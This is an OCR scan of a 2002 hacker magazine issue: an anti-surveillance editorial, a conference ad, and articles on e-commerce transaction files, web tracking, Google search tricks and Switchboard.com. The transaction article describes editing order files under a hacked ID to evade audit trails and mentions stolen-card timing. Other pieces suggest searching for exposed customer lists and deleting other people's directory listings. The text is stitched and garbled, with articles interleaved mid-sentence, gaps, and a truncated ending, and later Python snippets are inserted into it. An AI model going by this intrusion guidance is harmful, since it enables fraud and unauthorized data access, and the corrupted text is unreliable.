Whatever you want to call it, H2K2 will be the biggest hacker
conference in the States to date! With nearly 50,000 square
feet to play with, expect a variety of speakers, panels,
demonstrations, films, and a network like no other.

July 12 to 14, 2002
Hotel Pennsylvania
New York City

(Make hotel reservations at (212) 736-5000)

Admission for the entire weekend is $50
You can register online at www.2600.com or send a
check/money order by 6/15/02 to:
2600/H2K2
PO Box 752
Middle Island, NY 11953 USA

Check www.hope.net for updates!

More details on page 56
“I realize that this bill basically says you can tap someone’s phone for jaywalking,
and normally I would say, ‘No way.’ But after what happened on
September 11th, I say screw 'em.” - Dana Lee Dembrow, Democratic
member of the Maryland House of Delegates explaining her approval of a 
new bill that would greatly expand the ability of authorities to monitor 
e-mail and telephone traffic. Jaywalkers beware. 
It's sometimes hard to imagine which causes more
harm - corruption or indifference. One thing is becoming
clearer by the day: They're both needed to ensure
an ominous future.

What's been happening in our various governmental
bodies is shameful. With each passing day it
seems there's some other horrendous piece of legislation
on its way to becoming law. Our rights as individuals
are either being wiped away to benefit some
corporate interest or being severely compromised in 
the name of September 11. Either way it’s a repugnant 
development, one which must be fought on multiple 
levels by people of all backgrounds. 

The Digital Millennium Copyright Act (DMCA) 
is something we've all become acquainted with in recent
years. Passed in 1998, the DMCA was designed
to implement treaties signed at the World Intellectual 
Property Organization (WIPO) back in 1996. So far 
it's gotten us sued and gagged, a Russian programmer 
thrown into an American prison for writing software, 
and a whole host of intimidation tactics, lawsuits, and 
threats sent to individuals and companies all over the 
world. It is forever changing the concept of free use of 
technology and it’s the foundation upon which even 
more dangerous laws are being built. 

The Consumer Broadband and Digital Television
Promotion Act (CBDTPA), formerly the Security Systems
Standards and Certification Act (SSSCA), is but
one example. It sounds consumer-friendly but this bit
of legislation is going to make the DMCA look like
kid stuff. Imagine it being illegal to disable any security
technology, regardless of the reason. Or mandatory
restrictions of any feature which could be used to
copy something. Entire operating systems could be
outlawed. Computer security research will be crippled.
Technology itself could come to a screeching
halt since all digital technology will be forced to adhere
to a government-mandated standard. And we all
know how long it takes any government to get a grasp
on new technology. Going analog to avoid all this
nonsense won't even be an option in many cases. Digital
technology under these rules will be mandatory.
Take a look at what's happening to analog broadcasting
to see how serious they are about this.

The Copyright Arbitration Royalty Panel (CARP), 
another offshoot of the DMCA, is targeting Internet 
radio as if it were the second coming of Satan. The 
DMCA determined that Internet broadcasters must 
pay a specific fee for playing commercial music online,
regardless of how badly degraded the quality is.
CARP has come up with a fee structure to enforce this
which will now be decided upon by the U.S. Copyright
Office. That fee is actually based on a per song,
per listener equation which would not only bankrupt
most small and independent broadcasters, but would
actually require them to keep track of their listeners,
unlike their over-the-air counterparts. The overhead
of such an operation, not to mention the privacy concerns,
will likely persuade most broadcasters to simply
shut down and let the more commercial interests
take over. Of course, with enough support, this could 
actually come back to haunt the recording industry. 
Independent musicians alienated by the Recording In- 
dustry of America (RIAA), not to mention many from 
other parts of the globe, may unite against this act of 
greed and create a new alternative sound. But who
knows what new laws will spring up to thwart such a 
development once it becomes a reality? It’s clear that 
anything seen as a threat to those who manage to ac- 
quire everything will be quickly struck down in one 
way or another. 

And of course we will always have gems like the 
Communications Decency Act (CDA), which was 
overturned by the Supreme Court in 1997 as an un- 
constitutional attack on free speech. That led to the 
Child Online Protection Act (COPA), passed in 1998, 
which basically threatened to reduce the Internet to a 
playground for kids, imposing severe criminal and 
civil penalties on providers who may have “inappro- 
priate material" somewhere. Despite its being struck 
down by a court in 1999, more variations just keep on
coming. Now it's the Children’s Internet Protection 
Act (CIPA), which went into effect last year. This time 
libraries were targeted. Those that don’t comply with 
mandated blocking and filtering standards will lose 
funding. And the dance continues.

There's DCS-1000 (more aptly named "Carnivore"
in the past), the mysterious FBI e-mail snooping
program installed in the offices of Internet Service 
Providers nationwide. And there’s Magic Lantern, an- 
other FBI project, which reportedly infiltrates a user's 
computer via an e-mail attachment and then sets up 
monitoring software which can capture keystrokes, 
thereby helping to make encryption futile. 

We could even talk about the badly thought out 
USA Patriot act (which actually stands for "Uniting 
and Strengthening America by Providing Appropriate 
Tools Required to Intercept and Obstruct Terrorism") 
and all of its attacks on fundamental freedoms, not to 
mention the preponderance of imitators which seek to 
destroy what it is our nation stands for as some sort of
way of attacking those who want to destroy what it is 
our nation stands for. 

It's easy to become completely overwhelmed by
all of this and, as a defense mechanism, to simply shut
down and stop paying attention. In fact, this is rather
essential in order for such crazy laws to work in the 
first place. Imagine what would happen if everyone 
realized the threat, if everyone understood the tech- 
nology. The secret that is being kept from most is that 
people power does work, that activism is effective, 
and that “eternal vigilance” means continuous action,
not simply quoted words. 

This is where the hacker world comes in. Unlike
legislators and unlike those who have become swallowed
up by the "industry," we have an understanding
of the technology and the ability and desire to communicate
with others outside our world. What better way
to translate the evils of these new laws into terms that 
even one’s grandmother could understand? 

There are many groups already involved - EFF, 
EPIC, the ACLU, and more. They are all in desperate 
need of support. It’s absolutely vital that we help to 
take on this task. A look at many websites and handouts
concerning these issues shows that many quickly
become lost in legal or technical jargon that means 
nothing to the average person. The result is that the actual
threat never burns itself into that person's mind
and it becomes a non-issue to them from that point on. 





by StankDawg@hotmail.com

Let's jump right in to the first question: "What
the hell is a transaction based system?" [...]
straightforward as it sounds. It is a system that
works using transactions to process data. Remember
that interactive processing shows immediate results,
but batch processing takes more time.
Transaction based systems are exclusive to batch
processing (although some systems may support
both types of access).

For example, when you go to http://store.yahoo.com/2600hacker/
(plug, plug...) or some other
online shopping site, you add things to your shopping
cart and then finally go to checkout. This is
where you can see transaction processing happen.
Do you think a little bell rings somewhere in a
warehouse and someone runs to get your product
right away? No, it will create a transaction that performs
several functions. First, it will send the actual
order to 2600 notifying them of their obligation. It
also submits a transaction to the credit card company
with details of the purchase and asks for the
payment. It updates its own system at yahoo.com
with accounting information (billing 2600 for a flat
hosting fee, along with a per transaction fee to get
their “cut,” plus any number of other accounting
and tax record keeping functions). While you are
sitting there looking at the "thank-you for ordering"
screen, all these things have happened in the background.

So why should you care? Well, now that you 
know exactly what transactions are, where do you 
think the data in those transactions are kept? They 
are transactions that process data after all, and data 
doesn't normally just disappear. It is kept for tax 
purposes and billing purposes as mentioned before. 
Everything you have ever ordered online is maintained.
Don't overlook that fact. No one throws
data away! So far, I don't know of any centralized
location where all of your purchases are kept, but
We can help to fix that.

This will be one of the goals at H2K2 this July.
There will be many people from outside the hacker 
world who will come to hear what we have to say and 
who will be in a position to help us greatly if the facts 
are made clear to them. We need to come up with a 
comprehensive plan to fight not only what has already 
been proposed and adopted, but all of the future legis- 
lation that currently only exists in some warped law- 
makers’ minds. To do this, we will need to predict how 
their corrupted logic will proceed and be able to inspire
those who might otherwise not care. It’s going to
be a long and hard battle and the odds are already 
clearly against us. Can you think of a reason not to get
involved right away?












[...] their own [...] about being [...] so I digress.
[...] happens to your data [...] you understand that
[...] is this information [...] each individual company.
[...] the transaction cycle once
per day ([...] that warning that it may take
24 hours to process your transaction?). Some companies
run these programs hourly or even more frequently,
but this is stressful on a system. While
there has been a trend moving towards "live" inventory
and order processing, it is still in its infancy.
Generally, all of the orders taken at a
particular site will get stored in a temporary file in
the form of transactions. These transactions have
programs behind them that decode the transaction
data and tell the system what to do with the data
within. A typical (unencrypted) transaction can be
as simple as this:

Jinrai@dbz.com02132002 P2FL01 2600AnyroadNY 1234500 123456789000

If you look closely and decipher what you see, 
you may be able to figure out that the key to the file 
appears to be my friend's email address (this is 
common because it is unique and not as personal as 
someone's SSN). Beyond this, you might be able to 
figure out that on 02/13/2002 he purchased (the letter
P) two (2) products classified as “FL” (flowers)
which is product 01. The delivery address follows
(note that this entire transaction is made up) with
the last fields being his credit card number. This is
what the system gets when you click on that order 
button. Then, usually in the middle of the night 
(downtime for most systems) a batch job runs that 
picks apart these transactions and sends out the 
parts that I mentioned earlier in the article. This is
when the real work gets done and the order is truly
processed. The deduction from your account will
appear the next day, the warehouse will get the
work order to process the purchase, etc. So the
question I pose to you is how would I place an order
without ever seeing the web page?

Think about that for a second before reading 
further. You may see that the web is simply the in- 
terface that gathers information and generates the 
transactions. It is actually the transactions, and the 
programs that process these transactions, that actu- 
ally do the work. So if you could get into the trans- 
action file yourself, you would have direct control 
over the transactions. Now keep in mind that I am
only explaining how these systems work. I am not
suggesting or insinuating that you should do anything
illegal with this knowledge! You are on your
own there. I am only here to inform.

If you were able to gain access to this file (this 
is a topic that has been beaten to death, find your 
own way in), you could edit the file to have any 
transaction you wanted. You could cancel your own
order, change your address, or any other number of 
things. You probably realize by now that you are 
editing all of the records in the entire file, not just 
your own. And the beauty is that in my experience, 
the audit trail (the logging of who does what to the 
system) happens on the interface side of the house, 
not the data side. The web server logs your visit and
your order, but if you edit the file directly, it usually 
doesn’t get logged. They assume that general sys- 
tem security is keeping you away from this infor- 
mation. Obviously a good company will have good 





by Boris Loza 

You'd probably be surprised if you knew what
information is available about yourself on the Internet.
Whenever you connect to the Internet you
leave a great trail of information. Do you want to
know what kind? Go to http://www.leader.ru/secure/who.html
or http://www.anonymizer.com/snoop.cgi and see.

They can find out where you've come from, 
your operating system, browser type, and many
other things. Besides this, many servers keep care- 
ful records of your input into search engines, infor- 
mation that’s submitted in forms, your shopping 
habits on the Web, and information about uploaded/downloaded
files.

Who Gets This Information and How? 

Some companies, such as Doubleclick, create 
large databases of such information, which are
used by target advertising companies or which can
security that audits both, but in my experience it
doesn’t happen. You edit the file, and the worst case
I usually see is that it timestamps the edit and
marks it with the user's ID (which is unimportant if 
you are using a hacked ID). It is also unimportant 
because one of the parts usually in the transaction 
process is to sort the file and/or backup the file 
which puts the job timestamp and system ID back 
on the file! As the program runs, it hides your footsteps
for you!

Also, there is a timing issue involved when 
multiple transactions are going on. The order may 
be processed on an hourly cycle, but the credit card 
company may only process all of its charges at the 
end of the day. This is how people in the past would 
be able to use a stolen credit card all day without
getting caught. It wasn’t until the next day that the 
suspicious activity was noticed. Of course, the 
credit card companies got wise to this and now are 
much more up to date on their monitoring. 

With all of this being said (particularly my 
warning that you are at your own very high risk if 
you do anything illegal), I think that if you look
around each day you will see how transactions are 
extremely prevalent in your everyday life: The 
ATM will not process your deposit until the next 
business day (sometimes a manual process). A 
change of address may not be reflected until 24 
hours later. Listen jerk, I paid that ticket last week,
why hasn't it been cleared from my record? Wait- 
ing on a change of grade at school before you can 
get your loan? All of these can now be explained, 
and now, maybe you can do something about it
without waiting on someone else. 
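
The gap described above (the audit trail lives on the interface side, so a direct edit to the transaction file goes unnoticed) can be closed on the data side. The following is an added example, not part of the original article: the order front end seals each record with a chained HMAC and the nightly batch job refuses lines that do not verify. The record layout, the key and the function names are assumptions made for illustration, and the key is assumed to be stored where an account that can write the data file cannot read it.

```python
import hashlib
import hmac

GENESIS = "0" * 64  # chain start value (assumption of this sketch)


def _tag(key: bytes, prev_tag: str, record: str) -> str:
    """HMAC over the previous line's tag plus this record, so each line
    is bound both to its content and to its position in the file."""
    msg = (prev_tag + "\n" + record).encode("utf-8")
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def seal(records, key):
    """Interface side: emit 'record<TAB>tag' lines as orders are taken."""
    lines, prev = [], GENESIS
    for record in records:
        prev = _tag(key, prev, record)
        lines.append(record + "\t" + prev)
    return lines


def verify_batch(lines, key):
    """Batch side: return the 1-based numbers of lines that fail to verify."""
    bad, prev = [], GENESIS
    for number, line in enumerate(lines, start=1):
        record, sep, tag = line.rpartition("\t")
        expected = _tag(key, prev, record)
        if not sep or not hmac.compare_digest(expected.encode(), tag.encode()):
            bad.append(number)
        if sep:
            prev = tag  # continue the chain from the tag stored in the file
    return bad


# Constructed sample data: hypothetical pipe-delimited orders, no real card data.
KEY = b"constructed-demo-key-held-outside-the-data-directory"
ORDERS = [
    "alice@example.test|20020213|P|2|FL01|1 Any Road NY 12345|CARD-TOKEN-0001",
    "bob@example.test|20020213|P|1|BK07|2 Any Road NY 12345|CARD-TOKEN-0002",
    "carol@example.test|20020213|P|5|FL01|3 Any Road NY 12345|CARD-TOKEN-0003",
]

if __name__ == "__main__":
    sealed = seal(ORDERS, KEY)
    print("untouched file:", verify_batch(sealed, KEY))
    edited = list(sealed)
    edited[1] = edited[1].replace("2 Any Road", "9 Other Street")
    print("address edited in place:", verify_batch(edited, KEY))
    print("line 2 removed:", verify_batch([sealed[0], sealed[2]], KEY))
```

Lines removed from the end of the file are not caught by the chain alone; the batch job would also need a sealed record count or a final tag delivered out of band.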





be sold to any interested buyers. Have you ever 
wondered why every copy of Netscape running on 
Microsoft Windows defaults to home.netscape.com
as a home page and the Internet Explorer
browser defaults to www.msn.com?

Another method that web sites use to track vis- 
itors is a special feature called a cookie, which 
contains a small amount of information transmit- 
ted between a web server and a browser. Cookies 
can contain your username/ID, computer type, IP 
address, and server location. 

Ever heard of web bugs (also known as clear 
GIFs)? Like cookies, web bugs are electronic tags 
that help web sites and advertisers track visitors'
whereabouts in cyberspace. The placement of a
web bug on a page allows the site hosting the ban- 
ner ad to know your IP address and the page that 
you visited. This can be further correlated to 
cookie information that may be sent by your 
browser as part of the request to retrieve the page.
But web bugs are invisible on the page and are 
much smaller, about the size of the period at the 
end of this sentence. Unlike cookies, people can't 
see web bugs and anti-cookie filters won't catch 
them.

Browsers also contain other useful data for 
those who know how to make use of it, such as hit 
logging and GUID numbers, as used by Mi- 
crosoft’s Internet Explorer. Hit logging keeps track 
of all of your offline activities. When you click on 
a banner ad, a record is made of how long you
looked at it and what ad you clicked on, as well as 
personal information stored by the IE browser. Hit 
logging is also designed to “phone home” to the 
server that created it. 

GUID numbers are randomly generated "Guar- 
anteed Unique” or "Globally Unique" ID numbers. 
It’s highly unlikely that these numbers will ever 
occur twice across the planet. They are the ulti- 
mate "electronic dog tag" and can survive even if 
you kill the cookies and remove the "spyware." 

Since the GUID number is kept on your sys- 
tem, it can be requested at any time. And since Mi- 
crosoft has it on its databases - along with your 
name, address, and other registration details - the 
potential for creating a system that tracks your 
every online move is enormous. And there’s even 
more! Did you know that if you're on a network, 
every Office 97 file you create could be traced 
back to you? That's because Office 97 attaches its 
own permanent GUID to everything you create. So 
if you send a document to your best friend and she 
deletes its entire contents, replaces it with abuse 
about your boss, adds a macro virus to it, renames 
it, and sends it to everyone in your company, it’s
still got your address on it as the originator! You 
can see what GUID looks like by opening any Office
97 Word file with Notepad and searching for
the phrase GUID. A few bytes later, you'll find an
ID number broken up with spaces inside two curly 
braces. By the way, GUID helped to capture a cre- 
ator of the Melissa virus. But that’s another story. 

Other applications and companies that use 
"spyware" and "phone home" are RealNetwork's 
RealJukebox, PKZip, Bubbles, CuteFTP, and
many others. SurfMonkey is an application that's
supposed to block Internet sites inappropriate for 
kids, but it also keeps their personal ID, phone 
number, and email address. Radiate is a company 
that serves the shareware market. Popular applications
such as GO!Zilla, Free Solitaire, and
GetRight come embedded with an automated ad- 
serving "spyware" package created by Radiate. 
More than 400 different applications have this pro- 
gram embedded within them. 

The Comet Cursor from Comet Systems is cur- 
sor software that replaces the standard screen cur- 
sor with many funny-looking cartoon characters 
that appeal to kids, such as Garfield and Pokemon.
This is free software, but while users think they're
getting just a cute cursor, in reality every time they
visit any of 60,000 web sites supporting Comet 
Cursor technology, it will report the user’s unique 
serial number back to Comet Systems. Therefore, 
a profile of the user's interests can be compiled, 
and targeted ads can be served up to the users. 
(There's no such thing as a free lunch!) 

In this article, we'll show what you can do to
minimize, and sometimes prevent, submitting information
to the Internet on your behalf. Even if
you continue to allow it to happen, at least you'll 
be aware of how they do it. 

Cookies and Web Bugs 

When you revisit an Internet server, your 
browser shares the cookie previously installed on 
your hard drive, providing information that 
quickly identifies you. Whenever you hit a Web 
site supported by advertising, the ad server reads 
the cookie from your machine. The ad server then
uses your cookie to look up your profile and determine
which ad to serve to you dynamically, based
on the interests it’s gleaned from your surfing activities
at its member sites. The ad server also
records which advertisements you've clicked
through. The type of ad and the amount of time
you've spent at the site is also captured. Also keep
in mind that cookies, the subject of several lawsuits,
are sent in clear text, in both directions,
whenever encryption isn't used.

If you use Internet Explorer on Windows 2000,
you can see your cookies by opening the Documents
and Settings\[Your Profile]\Cookies directory.
The cookie folder consists of several files,
each of which is a text file containing an actual
cookie value. For more information about how Microsoft
"bakes" cookies check the "Cookies with
Your Coffee" article at
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dn_voices_webmen/html/webmen052797.asp

Microsoft IE 5.0 has a lot of menu and dialog
changes, but you can still disable cookies. Go to
the Tools/Internet Options/Security menu. In there,
you can choose the security level for four different
browsing conditions: Internet Sites, Local Sites,
"Trusted" Sites, and Restricted Sites. If you select 
"Internet", and click on Custom Level, you'll get a 
dialog box where you can accept all, warn before 
accepting, or reject all cookies. 

Once a cookie is rejected, it is thrown out and 
not saved to memory or disk. Don’t forget, though, 
that servers will keep looking for the cookie even 
if you have discarded it and may try to replace it as 
you surf around. Remember also that some web
sites (such as www.hotmail.com) require cookies.
You cannot log in to such websites if you've disabled
cookies.

Netscape users can also see their cookies found
in the C:\Program Files\Netscape\Users\[Your profile]\cookies.txt
file. This file consists of a block of
ASCII text. Briefly, what you can see in this file is:

Domain. The domain that created and can read
the variable (such as google.com).

Flag. A TRUE or FALSE value indicating if all
machines within a given domain can access the
variable. The browser, depending on the value set
for domain, sets this value automatically. 

Path. The path within the domain for which the 
variable is valid. 

Secure. A TRUE or FALSE value indicating if 
a secure connection (like SSL) with the domain is
needed to access the variable. 

Expiration. The time at which the variable will 
expire. Time is defined as the number of seconds 
since Jan 1, 1970 00:00:00 GMT (example: 
2145774284). 

Name. The name of the variable. 

Value. The value of the variable. 

For more information about Netscape cookies,
browse Netscape's Cookie Spec located at
http://www.netscape.com/newsref/std/cookie_spec.html.
For complete cookie information refer to
RFC 2109 at http://www.rfc.net/rfc2109.html.

Note that most cookies can be accessed by all 
hosts in the domain (e.g. google.com,
hotmail.msn.com, etc.)! 

If you want to disable cookies on Netscape go 
to the Edit/Preferences/Advanced/Cookie. 
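
To audit a cookies.txt file rather than read it by eye, the seven fields listed above can be parsed in order and each cookie checked for the exposures this article mentions. This is an added example, not code from the original article; the sample file contents, the field separator (tab), the one-year threshold and the names used are assumptions made for illustration.

```python
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass
class Cookie:
    domain: str
    all_hosts: bool    # the "Flag" field
    path: str
    secure: bool
    expires: datetime  # converted from seconds since Jan 1, 1970 GMT
    name: str
    value: str


def parse_cookies_txt(text):
    """Parse tab-separated cookie lines; skip comments and malformed lines."""
    cookies = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 7:
            continue
        domain, flag, path, secure, expiry, name, value = fields
        try:
            expires = datetime.fromtimestamp(int(expiry), tz=timezone.utc)
        except (ValueError, OverflowError, OSError):
            continue
        cookies.append(Cookie(domain, flag == "TRUE", path,
                              secure == "TRUE", expires, name, value))
    return cookies


def exposure(cookie, now):
    """Return short labels for the privacy exposures of one cookie."""
    notes = []
    if cookie.all_hosts:
        notes.append("domain-wide")   # every host in the domain can read it
    if not cookie.secure:
        notes.append("cleartext")     # sent without SSL
    if (cookie.expires - now).days > 365:
        notes.append("long-lived")    # threshold is an assumption
    return notes


# Constructed sample file; 2145774284 is the expiration example from the text.
SAMPLE = (
    "# Netscape HTTP Cookie File\n"
    ".tracker.example\tTRUE\t/\tFALSE\t2145774284\tid\t8000001a2b3c\n"
    "www.shop.example\tFALSE\t/cart\tTRUE\t1026432000\tsession\tabc123\n"
    "this line is not a cookie record\n"
)
SAMPLE_NOW = datetime(2002, 4, 1, tzinfo=timezone.utc)

if __name__ == "__main__":
    for c in parse_cookies_txt(SAMPLE):
        print(c.domain, c.name, c.expires.date(), exposure(c, SAMPLE_NOW))
```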

Web bugs, like cookies, are usually used
for tracking customer habits but are much harder
to detect. A web bug is a graphic on a web page or
in an email message that's designed to monitor
who's reading the page or message. Unfortunately,
this technique could be used toward malicious
ends, such as grabbing IP addresses or installing
files. The security company Security Space, in a
monthly report (http://www.securityspace.com/s_survey/data/man.200112/webbug.html),
has identified companies that benefit from the use 
of web bugs, including online advertising net- 
works DoubleClick and Linkexchange, as well as 
Google and America Online. 

The only way to find a web bug using the MS 
Internet Explorer and Netscape browsers is to view 
the HTML source code of a web page and search 
for IMG tags that match up with cookies stored on 
the user's computer. A web bug typically has its
HEIGHT and WIDTH parameters in the IMG tag
set to 1, it’s loaded from a different server than the
rest of the web page, and it has an associated
cookie. For example:

<img src="http://ads.msn.com/ads/ABUCHE/00742350015_TX.gif?Pagegroup=BECHK1" width="1" height="1" border="0" alt="*">

This web bug was placed on the home page by 
Microsoft's site www.bcentral.com to provide
"spy" information about visitors to ads.msn.com. 
By the way, this site contains more than ten web 
bugs! 
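
Searching the HTML source by hand can be automated with the two page-level criteria given above: an IMG tag whose HEIGHT and WIDTH are set to 1 and whose source is a different server than the page. This is an added example, not code from the original article; the sample HTML and host names are constructed, and the "same site" test (comparing the last two DNS labels) is a simplifying assumption. The same scan applies to the HTML body of an email message.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


def site_of(host):
    """Rough 'same site' key: the last two DNS labels (assumption; it does
    not know about multi-label suffixes such as co.uk)."""
    return ".".join((host or "").lower().split(".")[-2:])


def _pixels(value):
    """Parse an IMG dimension such as '1' or '1px'; None if not a number."""
    try:
        return int((value or "").strip().lower().replace("px", ""))
    except ValueError:
        return None


class _ImgCollector(HTMLParser):
    """Collect the attributes of every IMG tag (names are lowercased)."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images.append(dict(attrs))


def find_web_bugs(html, page_url):
    """Return IMG tags that are at most 1x1 and loaded from another site."""
    page_site = site_of(urlparse(page_url).hostname)
    collector = _ImgCollector()
    collector.feed(html)
    bugs = []
    for img in collector.images:
        src = img.get("src") or ""
        parsed = urlparse(src)
        host = parsed.hostname  # None for relative (first-party) URLs
        w, h = _pixels(img.get("width")), _pixels(img.get("height"))
        tiny = w is not None and h is not None and w <= 1 and h <= 1
        third_party = host is not None and site_of(host) != page_site
        if tiny and third_party:
            bugs.append({"src": src, "host": host,
                         "has_query": bool(parsed.query)})
    return bugs


# Constructed sample page: a logo, a first-party spacer, a visible
# third-party banner, and one invisible third-party image.
SAMPLE_HTML = """
<html><body>
<img src="/images/logo.gif" width="120" height="60" alt="logo">
<img src="/images/spacer.gif" width="1" height="1" alt="">
<img src="http://banners.adnet.example/468x60.gif" width="468" height="60">
<IMG SRC="http://ads.tracker.example/t.gif?uid=12345" WIDTH="1" HEIGHT="1" BORDER="0" ALT="">
</body></html>
"""

if __name__ == "__main__":
    for bug in find_web_bugs(SAMPLE_HTML, "http://www.shop.example/index.html"):
        print(bug)
```

A query string on a flagged image is worth reading closely, since that is where a visitor ID or email address would be carried.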

Email web bugs are also represented as 1-by-1
pixel IMG tags just like web bugs for web pages.
However, because the sender of the message already
knows your email address, they also could
include the email address in the web bug URL.
The email address can be in plain text or encrypted.

Spring 2002

Web bugs used with emails allow the measure- 
ment of how many people have viewed the same 
email message in a marketing campaign. They
help to detect whether someone has viewed a mes- 
sage. (People who don't view a message are re- 
moved from the list for future mailings.) They also 
help to synchronize a web browser cookie to a par- 
ticular email address, allowing a web site to know 
the identity of people who come to the site at a
later date. 

Using web bugs also allows the sender of an 
email message to see what has been written when 
the message is forwarded with comments to other 
recipients (http://www.privacyfoundation.org/privacywatch/report.asp?id=54&action=0).

For a demonstration of bugged email see
http://mackraz.com/trickybit/readreceipt/.

For more information, check the web bug FAQ
at http://www.eff.org/Privacy/Marketing/web_bug.html
or see the web bug gallery at
http://www.bugnosis.org/examples.html. You can
use a free web bug detector plug-in for IE called
Bugnosis by the Privacy Foundation
(http://www.bugnosis.org/).

Proxies, Anonymity Providing 
Servers, and Remailers 

One can remain anonymous while web surfing 
by using a proxy server. A proxy acts as an inter- 
mediary, routing communications between clients 
and the rest of a network. Web proxies can hide 
your IP address and allow you to stay anonymous. 
If you don’t use any proxy server yet, you may 
choose one from a free proxy public servers list at 
http://tools.rosinstrument.com/proxy. To configure
your Internet Explorer 5.0 browser to use a proxy, 
go to the Tools/Internet Options/Connections 
menu bar. Click on the Setup and follow the instructions
on the screen. Check the Manual Proxy
Server option and click on the Next. Put the host
name of the proxy you're going to use and a port
number (provided by proxy server). To check 
whether your proxy server reveals your IP address, 
go to http://www.all-nettools.com/pr.htm. If you 
get the message "Proxy Server Detected!", then 
there’s a security hole in your proxy and informa- 
tion about your real IP address is listed. (In this 
case, try to use another proxy.) If the message is 
"Proxy Server Not Detected", everything should 
be OK. 

Netscape users can add a proxy by going to 
Edit/Preferences/Advanced/Proxy. 

If you don't want to use a proxy server, try one 
of the anonymity providing servers listed below. 
These servers act as a proxy since web pages are 
retrieved by them rather than by the person actually
browsing the web (you). Go to one of these
web sites and just type a URL you want to visit -
the server does the job for you, securing you from
many potential dangers.

Some of the Anonymity Providing Servers Available

Servers with SSL Support 
Anonymyth: http://www.anonymyth.com 
Orangatango: 
http://www.orangatango.com/home/index.ns.html 
Rewebber: http://www.rewebber.com and 
http://www.anon.de 
Servers without SSL Support
Anonymouse: http://@nonymouse.com
Anonymizer: http://www.anonymizer.com
SiegeSoft: http://www.siegesoft.com 

Anonymyth uses 512-bit SSL encryption for all 
HTTP data, which prevents your ISP from tracking 
your Internet activities. The only traces that are left 
from your browsing are in your browser history 
list. 

If you want to remain anonymous while send- 
ing emails, you can use a remailer. This is a special 
service that receives an email message from you, 
then readdresses it, and sends it to the person you 
want to send it to. During the process, any headers 
that might point back to you are removed. Many
remailers are available on the Internet: some of
them let you put a fake return address, but most of
them directly state that the message is sent from an
anonymous source. One of these web-based remailers
can be found at https://ssl.dizum.com/help/remailer.html.
For a list of remailers check
http://security.tao.ca/email.shtml.

Other Useful Tips 

You may want to clear out your browser's his- 
tory list. This is something that should be done 
each time you're finished with your browsing if 
you don't want someone to be able to easily see 
where you've been surfing (if you share your Windows
workstation or server). To do this for Internet
Explorer 5.0:

Click the Tools menu bar.

Choose Internet Options.

On the General tab, click Clear History.

When it asks "Delete all items in your History
folder?" click OK.

Click the OK button at the bottom of the Internet
Options window.

Another place that your web trail is recorded is
the cache directory - a temporary storage area for 
recently visited pages and images. The cache al- 
lows for repeatedly visited Web sites to show up 
more quickly when you reload them into your 
browser. If you don't want people to read your 
cache it should be deleted. Note, however, that on
slower machines with slow connections, this will
result in a noticeable decrease in the speed when
your computer brings up previously visited web
pages. To delete your cache on IE 5.0:

Choose Internet Options from IE's Tools menu. 

Locate the Temporary Internet Files heading, 
click the Delete Files button, and choose OK when 
prompted. 

Click the OK button at the bottom of the Internet
Options window.

Close and restart your browser. 

Netscape users may go to the Edit/Preferences/Navigator
menu to delete your browser's
history list and to the Edit/Preferences/Navigator/Cache
to clean up your browser's cache.

Balance Your Paranoia 

This article isn't intended to frighten you. Just
remember that there isn't much privacy on the
Internet. So think carefully about which sites you
choose to visit, and think twice before you provide
any information about yourself.





Stupid Google Tricks 


by Particle Bored 

Google.com has long been the undisputed king 
of search engines, yet few are aware of its power 
as a hacking tool. I have discovered a few features 
that are sure to provide hours of fun for the whole 
family. 

To waste a few seconds of your life you can
change the language via the Language Tools link
on the main page. It is possible to change the
language of the interface to anything from Bengali
to Telugu, but I prefer Elmer Fudd. Do not attempt
to use the Hacker language while under the
influence of caffeine, as you are likely to kick a
hole in your monitor.

One of the features that gets me quite aroused
is Google's ability to search files with a specific
DOS extension. This is done by submitting a query
in the following format:
search terms filetype:ext

where search terms are, uh, your search terms,
and ext is a typical DOS file extension. Searches of
xls and mdb files are great for finding things like
customer lists. You can even search text within vbs
and dll files. As far as I can tell there are no limits
as to the file type, so there is plenty of room for
creativity.

I'm sure all of you have visited a worthless
web site where you can't locate information even
if you use their search engine, like sun.com. Well,
let Google search their site for you. Using sun.com
as an example, simply use the format:
search terms site:sun.com

and you will probably find what you seek.

Another cool feature is the ability to search for
sites that link to a specific site. Not only can you
use this to discover who is linking to your web site,
but it is good for quickly finding all of an
international company's web sites. For sun.com I
would use the format:
search terms link:sun.com

Use only the domain name or you will restrict
the results.

As for restricting results, there are times you 
will need to search only the title since searching all 
of the text yields far too many hits. Searching titles 
only can be done with this: 
allintitle: search terms 

I'm not sure why they changed the syntax on 
this one. Note the space after the colon, too. 


Google is great for working with phone numbers
as well. Searching on an area code and prefix
will quickly give you the location of an unknown
target since one of the hits is likely to contain an
address. But wait - Google can do reverse lookups,
too! Simply enter the area code and phone number
(in dashed format) as the query.

You may want to use this final trick quickly,
since I fear the functionality may disappear soon
after this article is published. Have you ever found
the perfect document, only to be denied access
because the .mil site where it resides doesn't like
your source IP? If you look within the query
results you will hopefully find links that say
"Cached" or "View as HTML". Follow the link
and you will be able to view Google's copy of the
document.


Neat Stuff with


by Cunning Linguist
cunninglinguist@hushmail.com

Switchboard.com - it's the Yellow Pages.
Electrified. Switchboard.com is an online directory
of citizens nationwide. You can find friends,
family, or anyone listed with a name you know. In
many cases, you'll come up with more than one
listing for a specified name. One of the cool things
about Switchboard.com is the fact that if a person
has all of their information you might be able to
find a lot more information than you intended. On
a search for my name, I found one of me listed in
my area and found his complete address, all three
of his phone numbers, and all of his e-mail
addresses.

Switchboard.com also provides hours of
entertainment for the bored teenager in his room
with nothing to do. Searching for one mister Harry
Balls provides barrels of laughs, as does searching
for Dick Paine and Harry Butts. But now, on to the
real stuff....

Like the Amazon.com mishap a while back,
where people could write comments about a book
as the author of that book, Switchboard.com
allows you to add or delete users listed without any
authentication whatsoever, except an e-mail
address. When I searched for my information, I
didn't find me, but I found my mother and father. I
opted to delete their listings from the database of
people, so I took the appropriate steps by clicking
on their names (which appear in bold text),
clicking the "Update Listing" link on the right-hand
menu, and click 
Listing”. (You 
simply enterin 
you'll throw a 
tering an e-m 
ceived a link i 
instructed to c 
to a page that te i 

